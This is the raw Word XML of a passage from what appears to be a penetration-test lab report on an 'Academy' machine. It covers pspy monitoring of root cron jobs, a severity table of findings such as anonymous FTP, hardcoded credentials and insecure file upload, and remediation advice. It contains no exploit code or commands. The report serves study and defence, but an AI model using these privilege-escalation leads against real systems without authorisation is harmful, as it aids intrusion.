                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3322955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A624AEF" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="5CDF2726">
          <v:rect id="_x0000_i1274" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E1925B" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>6.2 Privilege Escalation Monitoring Using pspy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B89D9A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The pspy tool was executed to monitor real-time system processes and scheduled tasks running with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82F00A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The tool identified multiple processes and cron jobs executing as the root user, indicating possible privilege escalation vectors such as writable scripts, insecure PATH usage, or misconfigured scheduled tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F9A54" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Although full root access was not achieved during testing, the findings indicate insufficient privilege hardening and potential escalation paths under different conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C5DF24" w14:textId="49471175" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="467591D1" wp14:editId="58A0E6AD">
            <wp:extent cx="5731510" cy="4160520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4141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2940" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4160520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A0317" w14:textId="5DCACC36" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48091F37" wp14:editId="109736FF">
            <wp:extent cx="5731510" cy="4265295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="4527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4852" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4265295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E802F92" w14:textId="1BEFAAFA" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547F0878" wp14:editId="2B5CC245">
            <wp:extent cx="5731510" cy="3903345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="15103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64459" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3903345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308387F" w14:textId="757625DF" w:rsidR="00374C28" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5097E342" wp14:editId="27BB24D8">
            <wp:extent cx="5731510" cy="4236720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6344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5903" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4236720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A736B16" w14:textId="2B97CF60" w:rsidR="00374C28" w:rsidRPr="00BA6C37" w:rsidRDefault="00374C28" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FB6A51" wp14:editId="6C488946">
            <wp:extent cx="5731510" cy="3522980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="177165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54254" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3522980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01107B89" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="77EDBAC3">
          <v:rect id="_x0000_i1275" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FE359" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>7.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882"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="4F48E042" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29A1D076" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC6F8F0" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="3B8B9904" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39D03259" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Anonymous FTP Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0328492B" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="0EE12028" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7579F03D" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Sensitive Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6202576F" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="160F17D5" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9B6868" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Hardcoded Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E0161BA" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="26BF37FA" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C11F236" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Insecure File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3785E56C" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w14:paraId="6298704B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10D34033" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Weak Privilege Hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="135297DB" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA6C37">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D18CEE2" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="7622C27F">
          <v:rect id="_x0000_i1276" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC55B38" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>8. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D491FC7" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6954E41E" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Disable anonymous FTP access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C03008" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Remove hardcoded credentials from source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF9AA3" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Restrict file upload extensions and validate MIME types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC699C" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Disable script execution in upload directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC4C08" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Long-Term Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D97E3" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implement a Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1408B629" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Enforce the principle of least privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D40FC71" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Conduct regular security audits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312141B6" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Use secure credential storage mechanisms such as environment variables or secrets vaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2A19B" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="2E8C857D">
          <v:rect id="_x0000_i1277" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="085EA3E2" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1D025" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The Academy machine was found to be highly vulnerable due to insecure configurations and weak development practices. An attacker could exploit these vulnerabilities to gain unauthorized access and potentially escalate privileges, resulting in full system compromise. Immediate remediation is strongly recommended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735AFA5F" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:pict w14:anchorId="5FE9CFEB">
          <v:rect id="_x0000_i1278" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444140A" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>10. Author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C16B1F" w14:textId="77777777" w:rsidR="00BA6C37" w:rsidRPr="00BA6C37" w:rsidRDefault="00BA6C37" w:rsidP="00BA6C37">
      <w:pPr>
        <w:rPr>
